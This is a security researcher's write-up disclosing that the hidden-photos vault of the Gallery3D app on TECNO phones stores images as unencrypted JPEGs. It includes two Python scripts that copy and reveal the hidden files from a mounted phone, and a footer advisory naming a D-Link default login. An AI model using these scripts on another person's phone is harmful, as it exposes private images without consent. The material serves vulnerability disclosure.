# Bypassing Gallary3D (Hidden Images Feature) In TECNO Camon X ## A lil' Bit About It This is something that I challenged my self to do, I had a TECNO Camon X CA7 Model, which is a smart phone and basically in all TECNO smart phone models, there is a feature that allows the user to hide images. I had to hide in some of the images and then I set a pin that I shall use to unlock the vault for hiding my images. A question flew into my mind **"What If I dont know the pin??"** Then I dared my self to take this challenge to research on this petty feature! ## Let The Fun Begin As seen, it asks for a pin, so as we can preview what's in the hidden album. ![](https://hackmd.io/_uploads/HJ9FXCOka.png) We can either bruteforce manually to get the pin since it's a 4 digits pin which will obviously be time consuming, but worth it eventually. Or we can decide to know where the image is then saved to after being sent to the hidden album. Connecting the smartphone to my laptop, and enabling the transfer of files, will allow me to view all folders in the system. ### Looking For The Files ![](https://hackmd.io/_uploads/SkLYEAOk6.png) while enumerating through the folders, I was able to get a folder in **/Android/data/com.android.gallery3d** which looked interesting: ![](https://hackmd.io/_uploads/H1UQLC_yp.png) This is getting even more interesting :) Opening up **.privatealbum**, there is another folder named **.encryptfiles** and it contains the images that we had imported earlier to the hidden vault. ![](https://hackmd.io/_uploads/Hk6sL0_kT.png) The images aren't really images, in this case, I pull the file to my local machine for even further analysis thinking that there might be some sort of encryption working behind all this. Unfortunately my Kali was off so I had to use cyberchef for some quick analysis over this file: ![](https://hackmd.io/_uploads/BkeYwA_yp.png) Now this was even easyyyy! The file type is **"image/jpeg"** ### Getting The Image Back To Normal Ezpizi, The easiest way to get the image back viewable is to just adding an image extension to the file, and we are able to view the image; ![](https://hackmd.io/_uploads/SymrOAOkp.png) ![](https://hackmd.io/_uploads/ByMD_CdkT.png) ### Automating The Exploit With all that clear, I decided to write an exploit script to automate all the processes, and retrieve any hidden image that is available in the smartphone! The link to the exploit is : [Gallery3D Tecno Exploit](https://github.com/tahaafarooq/gallery3d-tecno-exploit), Apart from just the exploit, there is also an android APK file that extracts the hidden images. Below is the **functions.py**: ```python # author : @tahaafarooq # date : 22/09/2023 # desc : pewpew import os import shutil import platform import mimetypes # check operating system def check_os(): system = platform.system() if system == "Windows": return "Windows" elif system == "Linux": return "Linux" class RunExploit(object): def __init__(self): self.author = "@tahaafarooq" def check_hidden_image_folder(self, path): folder = f"{path}/Internal shared storage/Android/data/com.android.gallery3d/.privatealbum/.encryptfiles/" if os.path.exists(folder): return "Found" else: return "Not Found" def unhide_images(self, path, destination): folder = f"{path}/Internal shared storage/Android/data/com.android.gallery3d/.privatealbum/.encryptfiles/" files = os.listdir(folder) for file in files: sf_path = os.path.join(folder, file) mt, _ = mimetypes.guess_type(sf_path) if mt: ext = mimetypes.guess_extension(mt) if ext: new_file_name = f"{os.path.splitext(file)[0]}{ext}" df_path = os.path.join(destination, new_file_name) else: df_path = os.path.join(destination, file) else: df_path = os.path.join(destination, file) shutil.copy(sf_path, df_path) print("Images Unhidden! Abracadabra!") return "Done" ``` Below is **run.py**: ```python # author : @tahaafarooq # date : 22/09/2023 # desc : pewpew import sys from functions import RunExploit, check_os if __name__ == "__main__": operating_system = check_os() if operating_system == "Windows": print("Sorry Mate! This Script Doesn't Run On Windows Yet!") sys.exit(0) elif operating_system == "Linux": source_path = input("Please Enter Your Mobile Mounted Path : ") dest_path = input("Please Enter Path To Save Unhidden Images (/home/kali/Documents/) : ") check_app_avlb = RunExploit().check_hidden_image_folder(source_path) if check_app_avlb == "Found": print("Revealing Hidden Images Now...") proc_unhide = RunExploit().unhide_images(source_path, dest_path) if proc_unhide == "Done": print(f"Please Open {dest_path} To View The Images") else: print("Unable To Reveal Images") else: print("Oops! Looks Like This Model Doesn't Have The Feature!") ``` Unfortunately didn't get any bounty on this since the device model is out of scope :( But PewPew! <div style="width:100%;height:0;padding-bottom:50%;position:relative;"><iframe src="https://giphy.com/embed/l1J9FtGm9VNUerkRi" width="100%" height="100%" style="position:absolute" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></div>
Last changed by  
Tahaa Farooq
お前はもう死んでいる
1233

Read more

Hackthebox Cyber Apocalypse 2024 CTF

Hello everybody reading this :), This is my writeup for the challenges hosted in Hackthebox Cyber Apocalypse CTF 2024 with the theme "Hacker Royale"

4/16/2024
PicoCTF 2024 Reverse Engineering Challenges Writeup

Below is my solution upon solving the reverse engineering category from picoCTF 2024. There was a total of 7 reverse engineering challenges. I could say they were pretty straight forward and interesting challenges!

3/26/2024
CyberTalents Writeup (Malware Reverse Engineering)

This is my approach to how i solved the challenges from the category Malware Reverse Engineering that is on the platform of CyberTalents

1/31/2024
DLINK DPH-400SE - Exposure of Sensitive Information to an Unauthorized Actor

With default credential for the guest user “guest:guest” to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users.

10/10/2023
Read more from Tahaa Farooq
Published on HackMD